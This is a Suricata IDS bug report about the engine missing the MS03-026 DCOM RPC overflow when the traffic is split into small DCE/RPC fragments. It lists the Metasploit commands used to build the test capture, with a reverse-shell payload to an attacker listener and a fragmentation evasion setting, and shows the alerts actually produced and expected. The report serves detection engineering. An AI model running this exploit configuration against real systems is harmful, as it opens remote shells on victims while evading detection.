Bug #206: Missed detection when dealing with fragmented RPC traffic (ms03-026) - Suricata - Open Information Security Foundation

Actions

Copy link

Bug #206

closed

Missed detection when dealing with fragmented RPC traffic (ms03-026)

Added by Will Metcalf almost 14 years ago. Updated over 13 years ago.

Status:

Closed

Priority:

Normal

Assignee:

Kirby Kuehl

Target version:

1.1beta1

Affected Versions:

Effort:

Difficulty:

Label:

Description

The attached pcap is generated from metasploit for ms03-026. We seem to alert properly for all available evasion techniques in metasploit except for the use of rpc frags. Setting the following we only alert on the cmd banner post exploitation.

use exploit/windows/dcerpc/ms03_026_dcom
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.78.254
set RHOST 192.168.78.21
set DCERPC::ReadTimeout 65535
set DCERPC::max_frag_size 20
exploit

src/suricata -s ../current-all-blah-newer.rules -l ./ -c suricata.yaml -r ms03_026_dcom-max_frag_size.pcap

exploitation is successful and we get..

07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

we should see..

07/07/10-20:35:03.679795 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://www.securityfocus.com/bid/8205][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0352][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0715][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx]
07/07/10-20:35:03.679795 [**] [1:2002908:4] ET EXPLOIT x86 JmpCallAdditive Encoder [**] [Classification: Executable code was detected] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://doc.emergingthreats.net/bin/view/Main/2002908][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders]
07/07/10-20:35:03.791672 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

Files

Download all files

ms03_026_dcom-max_frag_size.pcap (6.02 KB) ms03_026_dcom-max_frag_size.pcap	fragmented rpc traffic ms03-026	Will Metcalf, 07/07/2010 03:16 PM
0001-fix-multiple-dcerpc-fragments-in-one-packet.patch (8.41 KB) 0001-fix-multiple-dcerpc-fragments-in-one-packet.patch		Kirby Kuehl, 07/25/2010 04:12 PM

Actions

Copy link

Also available in: Atom PDF

Project

General

Profile

Suricata

Custom queries

Bug #206

Missed detection when dealing with fragmented RPC traffic (ms03-026)

Updated by Kirby Kuehl almost 14 years ago

Updated by Will Metcalf almost 14 years ago

Updated by Kirby Kuehl almost 14 years ago

Updated by Kirby Kuehl almost 14 years ago

Updated by Victor Julien over 13 years ago

Updated by Victor Julien over 13 years ago

Updated by Victor Julien over 13 years ago

Updated by Victor Julien over 13 years ago

Updated by Victor Julien over 13 years ago

Updated by Victor Julien over 13 years ago